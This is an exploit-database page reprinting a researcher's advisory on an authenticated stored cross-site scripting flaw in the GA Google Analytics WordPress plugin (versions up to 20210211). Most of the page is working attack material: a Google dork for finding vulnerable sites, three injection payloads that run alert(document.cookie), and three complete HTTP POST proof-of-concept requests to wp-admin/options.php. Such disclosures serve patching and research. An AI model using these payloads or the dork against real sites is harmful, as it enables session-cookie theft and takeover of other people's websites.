GA Google Analytics WordPress Plugin < = 20210211 - Multiple Authenticated Persistent XSS
CVE
Category
Price
Severity
CVE-2021-24181
CWE-79
$5,000
High
Author
Risk
Exploitation Type
Date
Cybersecurity Researcher
High
Remote
2021-05-17
CPE
cpe:cpe:/a:google_analytics:google_analytics_wordpress_plugin
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050090 Below is a copy:
GA Google Analytics WordPress Plugin <= 20210211 - Multiple Authenticated Persistent XSS /*!
- # VULNERABILITY: GA Google Analytics WordPress Plugin <= 20210211 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/ga-google-analytics/
- # DATE: 2021-04-04
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Jeff Starr [ https://plugin-planet.com ]
- # SOFTWARE VERSION: <= 20210211
- # SOFTWARE LINK: https://wordpress.org/plugins/ga-google-analytics/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: N/A
*/
### -- [ Info: ]
[i] An Authenticated Persistent XSS vulnerability was discovered in the GA Google Analytics plugin through v20210211 for WordPress.
[i] Vulnerable parameter(s): &gap_options[gap_id]=, &gap_options[tracker_object]=, &gap_options[gap_custom_code]=.
### -- [ Impact: ]
[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ Payloads: ]
[$] GA Tracking ID: 13"' ' m0ze=m0ze= onload=alert(document.cookie); //
[$] Custom Tracker Objects: '');alert(document.cookie);alert('m0ze'
[$] Custom Tracker Objects (Part #1): '\');alert(document.cookie);/* | Custom GA Code (Part #2): */;
### -- [ PoC #1 | Authenticated Persistent XSS | GA Tracking ID: ]
[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 459
Cookie: [admin cookies]
option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&gap_options%5Bgap_id%5D=13%22%27+%27+m0ze%3Dm0ze%3D+onload%3Dalert%28document.cookie%29%3B+%2F%2F&gap_options%5Bgap_enable%5D=2&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=&gap_options%5Bgap_custom_code%5D=&gap_options%5Bgap_custom%5D=
### -- [ PoC #2 | Authenticated Persistent XSS | Custom Tracker Objects: ]
[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 449
Cookie: [admin cookie]
option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dga-google-analytics%26settings-updated%3Dtrue&gap_options%5Bgap_id%5D=m0ze&gap_options%5Bgap_enable%5D=1&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=%27%27%29%3Balert%28document.cookie%29%3Balert%28%27m0ze%27&gap_options%5Bgap_custom_code%5D=&gap_options%5Bgap_custom%5D=
### -- [ PoC #3 | Authenticated Persistent XSS | Custom Tracker Objects & Custom GA Code: ]
[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 445
Cookie: [admin cookie]
option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dga-google-analytics%26settings-updated%3Dtrue&gap_options%5Bgap_id%5D=m0ze&gap_options%5Bgap_enable%5D=1&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=%27%5C%27%29%3Balert%28document.cookie%29%3B%2F*&gap_options%5Bgap_custom_code%5D=*%2F%3B&gap_options%5Bgap_custom%5D=
### -- [ Contacts: ]
[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum